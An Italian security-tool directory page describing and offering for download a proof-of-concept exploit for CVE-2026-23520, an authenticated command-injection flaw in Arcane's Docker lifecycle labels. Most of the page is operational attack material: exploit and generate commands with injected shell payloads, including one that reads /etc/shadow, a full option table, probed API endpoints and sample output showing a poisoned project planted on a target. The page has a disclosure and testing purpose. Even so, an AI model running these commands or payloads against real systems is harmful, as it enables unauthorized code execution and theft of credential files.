Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/augmaster/poc-cve-2026-23520
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubaugmaster/poc-cve-2026-23520

POC-CVE-2026-23520

Proof-of-concept exploit per CVE-2026-23520, una RCE autenticata nella gestione Docker di Arcane tramite iniezione di comandi OS nelle etichette del ciclo di vita. Include modalità check, exploit e generate.

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23520 — Esecuzione Remota di Codice tramite Etichetta del Ciclo di Vita di Arcane

Iniezione di Comandi di Sistema Operativo in Arcane Docker Management (< 1.13.0)

Panoramica

Arcane è una piattaforma moderna di gestione Docker basata sul web. Le versioni precedenti alla 1.13.0 sono vulnerabili a una Esecuzione Remota di Codice (RCE) autenticata tramite iniezione di comandi di sistema operativo nelle etichette del ciclo di vita del servizio di aggiornamento.

Il servizio di aggiornamento supportava due etichette dei container Docker:

EtichettaTrigger
com.getarcaneapp.arcane.lifecycle.pre-updatePrima di un aggiornamento del container
com.getarcaneapp.arcane.lifecycle.post-updateDopo un aggiornamento del container

Il valore dell'etichetta viene passato direttamente a /bin/sh -c senza alcuna sanificazione. Poiché qualsiasi utente autenticato (non solo gli amministratori) può creare progetti tramite l'API, un attaccante può inserire un progetto avvelenato. Quando un amministratore successivamente attiva un aggiornamento del container, il comando iniettato viene eseguito all'interno del container — e potenzialmente sull'host se sono presenti mount di volumi.

Flusso dell'Attacco

root@kitploit:~
 Attaccante (utente con privilegi bassi)          Server Arcane
 ────────────────────────                         ──────────────
 1. Autenticazione (qualsiasi utente)  ──────────►  JWT emesso
 2. Creazione progetto con                          Progetto salvato con
    etichetta del ciclo di vita avvelenata  ──────►  etichetta dannosa
                                                       │
         ┌─────────────────────────────────────────────┘
         │  3. L'amministratore attiva l'aggiornamento del container
         ▼
    L'updater di Arcane legge il valore dell'etichetta
    Lo passa a /bin/sh -c
         │
         ▼
    *** Esecuzione arbitraria di comandi ***
    (ambito container, o host se i volumi sono montati)

Versioni Interessate

StatoVersioni
VulnerabiliArcane < 1.13.0
CorretteArcane ≥ 1.13.0

La correzione (commit 5a9c2f9) rimuove completamente la funzionalità delle etichette del ciclo di vita per eliminare la superficie d'attacco.

Caratteristiche

  • Zero dipendenze — solo urllib della libreria standard, funziona su qualsiasi Python 3.10+
  • Probing resiliente — prova silenziosamente più percorsi API, nomi di chiavi di risposta e formati di campi credenziali per adattarsi a diverse versioni e configurazioni di Arcane
  • Tre modalità — check (fingerprint), exploit (deploy), generate (file compose offline)
  • Modalità verbose (-v) — mostra esattamente quali endpoint vengono sondati e cosa viene restituito

Utilizzo

Verifica se un target è vulnerabile

root@kitploit:~
python3 poc_cve_2026_23520.py check -t <TARGET_IP>

Distribuisci l'exploit

root@kitploit:~
python3 poc_cve_2026_23520.py exploit \
    -t <TARGET_IP> \
    -u <USERNAME> \
    -p <PASSWORD> \
    --payload "id"

Genera un file compose avvelenato (offline)

root@kitploit:~
python3 poc_cve_2026_23520.py generate --payload "cat /etc/shadow"

Debug del probing degli endpoint

root@kitploit:~
python3 poc_cve_2026_23520.py -v check -t <TARGET_IP>

Opzioni complete

root@kitploit:~
usage: poc_cve_2026_23520.py [-h] [-v] {exploit,check,generate} ...

positional arguments:
  {exploit,check,generate}
    exploit             Distribuisci il progetto avvelenato tramite l'API di Arcane
    check               Esegui il fingerprint di Arcane e verifica se è vulnerabile
    generate            Genera un file compose avvelenato (nessuna rete richiesta)

options:
  -h, --help            Mostra questo messaggio di aiuto ed esci
  -v, --verbose         Mostra l'output di debug del probing

Flag dell'exploit:

FlagDescrizioneDefault
-t, --targetHost Arcane (IP o hostname)obbligatorio
-P, --portPorta Arcane3552
-u, --usernameQualsiasi utente Arcane autenticatoobbligatorio
-p, --passwordPassword dell'utenteobbligatorio
--payloadComando shell da iniettareid
--hookHook di aggiornamento pre o postpre
--project-nameNome del progetto avvelenatopoc-cve-2026-23520
--env-idID dell'ambiente (rilevato automaticamente se omesso)auto
--schemehttp o httpshttp
--no-verifySalta la verifica del certificato TLSoff

Resilienza degli Endpoint

Lo script non codifica un singolo percorso API. Invece, sonda silenziosamente più percorsi noti per ogni operazione e si ferma al primo successo:

OperazioneEndpoint provati
Versione/api/version, /api/system/version, /api/v1/version, /api/settings/version, /api/status, /api/health, /api/info
Autenticazione/api/auth/login, /api/login, /api/v1/auth/login, /api/auth/signin, /api/users/login
Ambienti/api/environments, /api/v1/environments, /api/endpoints, /api/v1/endpoints
Creazione progetto/api/environments/{id}/projects, /api/v1/environments/{id}/projects, /api/projects, /api/v1/projects, e altri

Anche le chiavi di risposta vengono abbinate in modo flessibile (ad es., currentVersion, version, Version, serverVersion — inclusi oggetti annidati e ricerca senza distinzione tra maiuscole e minuscole).

Esempio di Output

root@kitploit:~
   ╔═══════════════════════════════════════════════════════╗
   ║          CVE-2026-23520  PoC Exploit                  ║
   ║    Arcane < 1.13.0 — Lifecycle Label RCE              ║
   ╚═══════════════════════════════════════════════════════╝

  ── Step 1 · Fingerprinting Target ──
  [*] Target: http://10.129.7.208:3552
  [*] Probing version endpoints …
  [+] Found version via /api/version
  [+] Arcane version: v1.12.4
  [+] Version v1.12.4 is < 1.13.0 — VULNERABLE

  ── Step 2 · Authentication ──
  [*] Authenticating as attacker …
  [+] JWT obtained via /api/auth/login

  ── Step 3 · Environment Discovery ──
  [*] Probing environment endpoints …
  [+] Found 1 environment(s) via /api/environments
  [*]   → 1  (local)
  [+] Using environment: 1

  ── Step 4 · Planting Poisoned Project ──
  [*] Injecting payload into lifecycle label: pre-update
  [*] Label : com.getarcaneapp.arcane.lifecycle.pre-update
  [*] Value : id
  [+] Project created via /api/environments/1/projects

  ── Exploit Planted Successfully ──
  [+] The poisoned project is now waiting for an update trigger.

Riferimenti

  • Advisory: GHSA-gjqq-6r35-w3r8
  • NVD: CVE-2026-23520
  • Commit di correzione: 5a9c2f9
  • Release corretta: v1.13.0

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. L'autore non è responsabile per qualsiasi uso improprio. Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare.

Licenza

MIT

Scarica lo strumento